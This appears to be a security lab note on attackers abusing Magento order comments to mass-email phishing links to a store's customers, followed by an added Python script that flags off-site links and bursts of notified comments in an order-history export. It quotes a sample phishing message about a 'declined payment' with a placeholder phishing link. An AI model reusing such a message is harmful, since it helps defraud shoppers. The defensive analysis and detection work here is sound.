Magento as a Phishing Spam Sending Tool

Labs Note

The most typical reasons for a Magento website to be compromised are theft of credit card information or diversion of payments to the attackers' accounts, but recently we found a completely different objective, one that can be destructive to the reputation of your website.

When attackers exploit a vulnerability in your store and obtain admin user permissions, they can easily add new comments to all orders (both completed and pending). Magento emails these comments to customers, and attackers abuse this feature to send out phishing emails.

Here is what they currently send out:

<http://www.CompromisedSite .com/>

Your order #100007891 has been updated to: Complete

Attention! Your payment has been declined. Full information - hxxp://www.PhishingDomain .com/eBay/

You can check the status of your order by logging into your account <https://www.CompromisedSite .com/customer/account/>.

If there are 10,000+ orders on your website, this means that 10,000+ emails will be sent all at once, and every one of them will include a link to a phishing domain. If an attacker has compromised multiple Magento sites, the volume may be comparable to that of real mass-spamming tools. However, emails sent by Magento may be more credible, since recipients already know the sites the emails come from and the emails contain their valid order numbers.

There is not much webmasters can do once the attackers are in. As a partial mitigation, you can configure a server quota on how many emails can be sent per day, so that only a small number of your customers actually receive the phishing emails before you notice it.
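Noticing the abuse quickly is the other half of the mitigation. The following script is an added example, not code from the original note or from Magento: it scans an export of the order status history for customer-notified comments that link off-site and for bursts of notified comments within a single minute. The column names are assumed to mirror Magento 1's sales_flat_order_status_history table, the store domain is assumed, and the sample rows are constructed.

```python
"""Flag the mass order-comment abuse described above in a Magento
order-history export. Column names mirror Magento 1's
sales_flat_order_status_history table (an assumption; adjust to your
schema); the sample rows below are constructed for this example."""
import csv
import io
import re
from collections import Counter
from datetime import datetime
from urllib.parse import urlparse

STORE_DOMAIN = "www.compromisedsite.com"  # the shop's own host (assumed)
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)

# Constructed export: one legitimate notified comment, then a burst of
# notified comments that all link to a foreign domain, then an internal note.
SAMPLE_CSV = """parent_id,is_customer_notified,comment,created_at
100007800,1,Shipped via UPS. Track it at https://www.compromisedsite.com/track,2015-05-01 09:14:02
100007891,1,Attention! Your payment has been declined. Full information - http://www.phishingdomain.com/eBay/,2015-05-02 03:00:01
100007892,1,Attention! Your payment has been declined. Full information - http://www.phishingdomain.com/eBay/,2015-05-02 03:00:02
100007893,1,Attention! Your payment has been declined. Full information - http://www.phishingdomain.com/eBay/,2015-05-02 03:00:02
100007894,0,Internal note: customer called about delivery,2015-05-02 03:00:03
"""


def foreign_links(comment):
    """Return the hosts linked from a comment that are not the store's own."""
    hosts = set()
    for url in URL_RE.findall(comment):
        host = urlparse(url).hostname
        if host and host.lower() != STORE_DOMAIN:
            hosts.add(host.lower())
    return hosts


def scan_history(csv_text, burst_threshold=3):
    """Return (suspicious rows, minutes with >= burst_threshold notified
    comments). A row is suspicious when the customer was notified and the
    comment links off-site; a burst alone is worth a look even without links."""
    suspicious, per_minute = [], Counter()
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["is_customer_notified"] != "1":
            continue  # internal notes are never emailed to the customer
        created = datetime.strptime(row["created_at"], "%Y-%m-%d %H:%M:%S")
        per_minute[created.strftime("%Y-%m-%d %H:%M")] += 1
        hosts = foreign_links(row["comment"])
        if hosts:
            suspicious.append((row["parent_id"], sorted(hosts)))
    bursts = {m: n for m, n in per_minute.items() if n >= burst_threshold}
    return suspicious, bursts
```

Run it against a CSV dump of the history table on a schedule; a non-empty `bursts` result is a cheap early warning even when the comment text carries no link at all.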

This kind of attack can have a very severe impact on your website's reputation. All your old and regular customers will find out that your site is compromised (unless they fail to spot the scam in the emails). It shows how important it is to keep your store constantly patched and protected.
